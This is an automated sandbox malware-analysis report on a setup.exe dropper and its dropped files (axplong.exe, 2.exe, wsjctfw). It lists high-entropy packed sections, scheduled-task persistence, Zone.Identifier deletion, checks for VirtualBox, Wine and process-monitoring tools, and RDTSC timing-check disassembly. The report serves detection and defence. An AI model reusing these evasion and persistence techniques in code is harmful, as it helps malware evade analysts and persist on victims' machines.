Source: setup.exe	Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: qzeqbxes
Source: setup.exe	Static PE information: section name: qgghuozc
Source: setup.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: qzeqbxes
Source: axplong.exe.0.dr	Static PE information: section name: qgghuozc
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: 2[1].exe.7.dr	Static PE information: section name: .cus
Source: 2[1].exe.7.dr	Static PE information: section name: .rufaxu
Source: 2.exe.7.dr	Static PE information: section name: .cus
Source: 2.exe.7.dr	Static PE information: section name: .rufaxu
Source: wsjctfw.9.dr	Static PE information: section name: .cus
Source: wsjctfw.9.dr	Static PE information: section name: .rufaxu

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0024D84C push ecx; ret	7_2_0024D85F
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_0040232D push eax; ret	8_2_00402331
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_00403282 push eax; ret	8_2_0040328B
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_00402097 push eax; retf	8_2_0040209B
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_00401BB2 push ebp; retf	8_2_00401BB3
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_0248570A push eax; retf	8_2_02485718
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_0248532F push esp; retf	8_2_02485362
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_02486238 pushad ; retf	8_2_0248623C
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_024865DD push eax; ret	8_2_024865E0
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_024861ED push E60329CCh; iretd	8_2_02486202
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_024849FA push cs; ret	8_2_02484A01
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_02484CF0 pushad ; retf	8_2_02484CFB
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_02484A95 push es; retf	8_2_02484AAF
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_02487BA1 push edi; iretd	8_2_02487BA2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_025C1C19 push ebp; retf	8_2_025C1C1A
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_025C20FE push eax; retf	8_2_025C2102
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_025C2394 push eax; ret	8_2_025C2398
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0040232D push eax; ret	10_2_00402331
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_00403282 push eax; ret	10_2_0040328B
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_00402097 push eax; retf	10_2_0040209B
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_00401BB2 push ebp; retf	10_2_00401BB3
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0249614D push E60329CCh; iretd	10_2_02496162
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0249495A push cs; ret	10_2_02494961
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_02494C50 pushad ; retf	10_2_02494C5B
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0249566A push eax; retf	10_2_02495678
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_02497B01 push edi; iretd	10_2_02497B02
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0249653D push eax; ret	10_2_02496540
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_024949F5 push es; retf	10_2_02494A0F
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0249528F push esp; retf	10_2_024952C2
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_02496198 pushad ; retf	10_2_0249619C
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_04081C19 push ebp; retf	10_2_04081C1A

Source: setup.exe	Static PE information: section name: entropy: 7.978158442993088
Source: setup.exe	Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.978158442993088
Source: axplong.exe.0.dr	Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: 2[1].exe.7.dr	Static PE information: section name: .text entropy: 7.778601168086073
Source: 2.exe.7.dr	Static PE information: section name: .text entropy: 7.778601168086073
Source: wsjctfw.9.dr	Static PE information: section name: .text entropy: 7.778601168086073

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\setup.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wsjctfw	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wsjctfw

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wsjctfw:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\wsjctfw	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\wsjctfw	API/Special instruction interceptor: Address: 7FF8C88ED584

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wsjctfw, 0000000A.00000002.3041841696.000000000247E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 7CF1E2 second address: 7CEA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FBA24820DA5h 0x00000010 jmp 00007FBA24820D9Fh 0x00000015 nop 0x00000016 jmp 00007FBA24820DA7h 0x0000001b push dword ptr [ebp+122D1685h] 0x00000021 jno 00007FBA24820D9Ch 0x00000027 call dword ptr [ebp+122D389Ah] 0x0000002d pushad 0x0000002e jns 00007FBA24820DADh 0x00000034 xor eax, eax 0x00000036 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D1EFAh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D29CCh], eax 0x0000004e js 00007FBA24820DA2h 0x00000054 js 00007FBA24820D9Ch 0x0000005a sub dword ptr [ebp+122D1D98h], esi 0x00000060 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000066 mov esi, 0000003Ch 0x0000006b cld 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D1A4Ch], esi 0x00000076 lodsw 0x00000078 jmp 00007FBA24820DA8h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 clc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 push eax 0x00000088 push esi 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 7CEA92 second address: 7CEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9426FE second address: 94270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FBA24820D96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 94270E second address: 942718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBA2516CD46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 942859 second address: 942862 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 942862 second address: 942868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 942868 second address: 94286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 942C31 second address: 942C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007FBA2516CD46h 0x0000000b jl 00007FBA2516CD46h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jmp 00007FBA2516CD4Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBA2516CD56h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 942C69 second address: 942C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 942C6D second address: 942C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945CC9 second address: 945CDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBA24820D96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945CDB second address: 945D9B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D381Dh], ebx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2838h] 0x0000001c push AC4A6A3Fh 0x00000021 jg 00007FBA2516CD57h 0x00000027 jmp 00007FBA2516CD51h 0x0000002c add dword ptr [esp], 53B59641h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FBA2516CD48h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d stc 0x0000004e push 00000003h 0x00000050 jmp 00007FBA2516CD55h 0x00000055 push 00000000h 0x00000057 xor dword ptr [ebp+122D1F2Ch], edx 0x0000005d push 00000003h 0x0000005f mov ecx, dword ptr [ebp+122D28F4h] 0x00000065 push D4A09635h 0x0000006a push esi 0x0000006b jmp 00007FBA2516CD54h 0x00000070 pop esi 0x00000071 xor dword ptr [esp], 14A09635h 0x00000078 mov edi, dword ptr [ebp+122D2940h] 0x0000007e lea ebx, dword ptr [ebp+1244AB95h] 0x00000084 sub cl, 0000002Ah 0x00000087 xchg eax, ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945D9B second address: 945D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945D9F second address: 945DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945EC0 second address: 945EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945EC4 second address: 945EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007FBA2516CD52h 0x00000011 jo 00007FBA2516CD4Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945EDD second address: 945EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FBA24820D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945EEC second address: 945F14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA2516CD54h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007FBA2516CD54h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945F14 second address: 945F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945F1A second address: 945F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dl, bh 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c mov edx, 3EB584ABh 0x00000011 jo 00007FBA2516CD5Fh 0x00000017 call 00007FBA2516CD56h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 push 83C34CDFh 0x00000026 pushad 0x00000027 jmp 00007FBA2516CD4Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 945F65 second address: 945FAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3C3CB321h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FBA24820D98h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c lea ebx, dword ptr [ebp+1244AB9Eh] 0x00000032 mov esi, dword ptr [ebp+122D2944h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007FBA24820D96h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 94602D second address: 94603E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 94603E second address: 946042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 946042 second address: 94608C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FBA2516CD48h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, 52B5CB0Fh 0x0000002f push 00000000h 0x00000031 mov di, 8D13h 0x00000035 call 00007FBA2516CD49h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 94608C second address: 946090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 946090 second address: 946096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 946096 second address: 946103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBA24820D96h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 jp 00007FBA24820D98h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jns 00007FBA24820DACh 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007FBA24820D9Eh 0x0000002b jmp 00007FBA24820DA9h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 946103 second address: 946107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 966FA1 second address: 966FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 966FA7 second address: 966FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA2516CD46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 966FB2 second address: 966FD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA24820DA5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 96531D second address: 96534D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBA2516CD4Ch 0x00000008 push edx 0x00000009 jmp 00007FBA2516CD52h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FBA2516CD48h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 965495 second address: 965499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 965499 second address: 9654C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007FBA2516CD46h 0x00000019 je 00007FBA2516CD46h 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9654C5 second address: 9654D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820D9Eh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9658B4 second address: 9658B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 965D11 second address: 965D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 965D15 second address: 965D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA2516CD4Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
